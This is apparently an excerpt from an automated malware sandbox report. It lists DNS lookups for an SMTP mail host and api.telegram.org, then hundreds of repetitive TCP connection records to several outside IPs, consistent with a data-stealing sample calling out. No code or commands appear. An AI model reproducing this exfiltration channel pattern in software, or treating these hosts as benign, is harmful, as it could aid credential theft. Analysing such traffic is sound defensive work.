                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficDNS query: name: api.telegram.org
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49186 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49195 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49197 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49199 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49201 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49202 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 158.101.44.242:80
                        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 158.101.44.242:80
                        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 158.101.44.242:80
                        Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
                        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 193.122.130.0:80
                        Source: global trafficTCP traffic: 192.168.2.22:49173 -> 158.101.44.242:80
                        Source: global trafficTCP traffic: 192.168.2.22:49175 -> 193.122.6.168:80
                        Source: global trafficTCP traffic: 192.168.2.22:49177 -> 132.226.247.73:80
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 158.101.44.242:80
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 158.101.44.242:80
                        Source: global trafficTCP traffic: 192.168.2.22:49181 -> 132.226.8.169:80
                        Source: global trafficTCP traffic: 192.168.2.22:49178 -> 158.101.44.242:80
                        Source: global trafficTCP traffic: 192.168.2.22:49183 -> 132.226.8.169:80
                        Source: global trafficTCP traffic: 192.168.2.22:49185 -> 193.122.6.168:80
                        Source: global trafficTCP traffic: 192.168.2.22:49187 -> 132.226.8.169:80
                        Source: global trafficTCP traffic: 192.168.2.22:49189 -> 132.226.8.169:80
                        Source: global trafficTCP traffic: 192.168.2.22:49191 -> 132.226.247.73:80
                        Source: global trafficTCP traffic: 192.168.2.22:49193 -> 193.122.6.168:80
                        Source: global trafficTCP traffic: 192.168.2.22:49194 -> 193.122.6.168:80
                        Source: global trafficTCP traffic: 192.168.2.22:49196 -> 193.122.6.168:80
                        Source: global trafficTCP traffic: 192.168.2.22:49200 -> 193.122.6.168:80
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49180 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49182 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49184 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49186 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49186 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49186 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49186 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49186 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49186 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49195 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49195 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49195 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49195 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49195 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49195 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49197 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49197 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49197 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49197 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49197 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49197 -> 188.114.96.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49199 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49199 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49199 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49199 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49199 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49199 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49199 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49199 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49201 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49201 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49201 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49201 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49201 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49201 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49202 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49202 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49202 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49202 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49202 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49202 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49202 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49202 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49204 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49204 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49204 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49204 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49204 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49204 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49204 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49206 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49206 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49206 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49206 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49206 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49206 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49206 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49209 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49209 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49209 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49209 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49209 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49210 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49210 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49210 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49209 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49209 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49210 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49210 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49210 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49210 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49212 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49212 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49212 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49212 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49212 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49212 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49212 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49215 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49215 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49215 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49215 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49215 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49216 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49216 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49216 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49215 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49215 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49216 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49216 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49216 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49216 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49218 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49218 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49218 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49218 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49218 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49218 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49218 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49219 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49219 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49219 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49219 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49219 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49219 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49219 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49221 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49221 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49221 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49221 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49221 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49221 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49221 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49223 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49223 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49223 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49223 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49223 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49223 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49223 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49224 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49224 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49224 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49224 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49224 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49224 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49224 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49224 -> 149.154.167.220:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49161
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49161
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49161
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49161
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49161
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49161
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49161
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49161
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49161
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 159.203.133.15:443 -> 192.168.2.22:49161
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49161 -> 159.203.133.15:443
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49162
